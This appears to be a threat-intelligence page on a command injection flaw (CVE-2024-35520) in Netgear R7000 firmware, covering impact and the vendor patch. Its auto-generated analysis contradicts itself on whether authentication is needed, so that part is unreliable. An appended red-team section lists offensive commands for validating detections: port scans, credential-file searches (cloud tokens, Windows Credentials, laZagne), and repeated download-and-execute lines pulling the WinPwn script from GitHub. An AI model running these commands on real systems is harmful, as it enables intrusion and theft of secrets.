CVE-2024-35520
Overview
This vulnerability is a command injection flaw occurring in the Netgear R7000 firmware version 1.0.11.136. It arises from improper input validation of the device_name2 parameter within the RMT_invite.cgi component, allowing crafted input to be executed as system commands. The flaw resides in the CGI script handling remote management invitations, where user-supplied data is not sanitized before being passed to shell commands.
Vulnerability Description
Netgear R7000 1.0.11.136 is vulnerable to Command Injection in RMT_invite.cgi via device_name2 parameter.
Impact
An attacker with authenticated access to the Netgear R7000 device can exploit this vulnerability to execute arbitrary system commands with high privileges. This enables unauthorized control over the device, potentially leading to data compromise, persistent access, or network pivoting. The attack requires network access and valid credentials, as indicated by the CVSS vector specifying high privileges required (PR:H) and attack vector as adjacent network (AV:A). The vulnerability can result in full device compromise and disruption of network services.
Solution
Netgear has released a security advisory (PSV-2023-0154) addressing this issue and recommends upgrading the R7000 firmware to a version later than 1.0.11.136 where the vulnerability is patched. Users should apply the official firmware update provided by Netgear, available at https://kb.netgear.com/000066027, to remediate this command injection flaw. No alternative workarounds are specified; applying the vendor-provided patch is necessary for mitigation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Netgear R7000 router firmware version 1.0.11.136 is characterized by a command injection flaw within the RMT_invite.cgi script. This vulnerability arises from improper validation of user-supplied input, specifically the device_name2 parameter. Attackers can exploit this weakness by crafting malicious input that gets executed on the underlying system, allowing them to run arbitrary commands with the privileges of the web server process. The lack of adequate sanitization and validation of input parameters is a critical oversight that exposes the device to potential compromise.
Exploitation of this command injection vulnerability can occur through various attack vectors. An attacker could leverage a crafted HTTP request targeting the RMT_invite.cgi script, embedding malicious commands within the device_name2 parameter. This could be executed remotely without authentication, making it particularly dangerous. Scenarios include an attacker gaining control over the router, which could lead to further network infiltration, data exfiltration, or the installation of malware. Additionally, if the router is part of a larger network, the attacker could pivot to other devices, escalating the impact of the breach.
The real-world implications of this vulnerability are significant, especially for businesses relying on the affected router for their network infrastructure. Compromised routers can lead to unauthorized access to sensitive data, disruption of services, and potential financial losses. Furthermore, the reputational damage from a security breach can be long-lasting, affecting customer trust and brand integrity. For organizations that handle sensitive information or operate in regulated industries, the consequences could extend to legal ramifications and compliance violations, amplifying the overall business risk.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating router firmware is crucial, as manufacturers often release patches that address known vulnerabilities. Network monitoring tools can be deployed to detect unusual traffic patterns or unauthorized access attempts, which may indicate exploitation attempts. Additionally, implementing strict access controls and segmenting networks can limit the potential impact of a successful attack. Users should also be encouraged to change default credentials and disable unnecessary services to reduce the attack surface.
In conclusion, the command injection vulnerability in the Netgear R7000 router firmware represents a serious security risk that can be exploited by malicious actors to gain unauthorized access and control over affected devices. Understanding the technical details of the vulnerability, potential attack vectors, and real-world impacts is essential for organizations to develop effective detection and mitigation strategies. By prioritizing firmware updates, employing robust monitoring practices, and maintaining a proactive security posture, businesses can significantly reduce their exposure to this and similar vulnerabilities, safeguarding their networks and sensitive data from potential threats.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2024-35520, with new evidence indicating the vulnerability is being targeted in the wild. Our telemetry shows a sharp increase in detection events involving attempts to exploit the command injection flaw via the device_name2 parameter on Netgear R7000 devices. Correspondingly, the EPSS score has inched upward, reflecting a growing likelihood of exploitation. Although no new exploit variants or proof-of-concept codes have surfaced, the uptick in observed exploitation attempts signals a shift from theoretical risk to active threat. This development heightens the urgency for defenders to monitor network traffic for anomalous behavior linked to this vulnerability. The increased exploitation activity elevates the threat level from a moderate concern to a more immediate operational risk, underscoring the need for heightened vigilance in environments deploying the affected firmware.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Netgear | R7000 Firmware | 1.0.11.136 |
cpe:2.3:o:netgear:r7000_firmware:1.0.11.136:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-35520 |
| kb.netgear.com |
GitHub CVE
|
https://kb.netgear.com/000066027/Security-Advisory-for-Post-Authentication-Command-Injection-on-the-R7000-PSV-2023-0154 |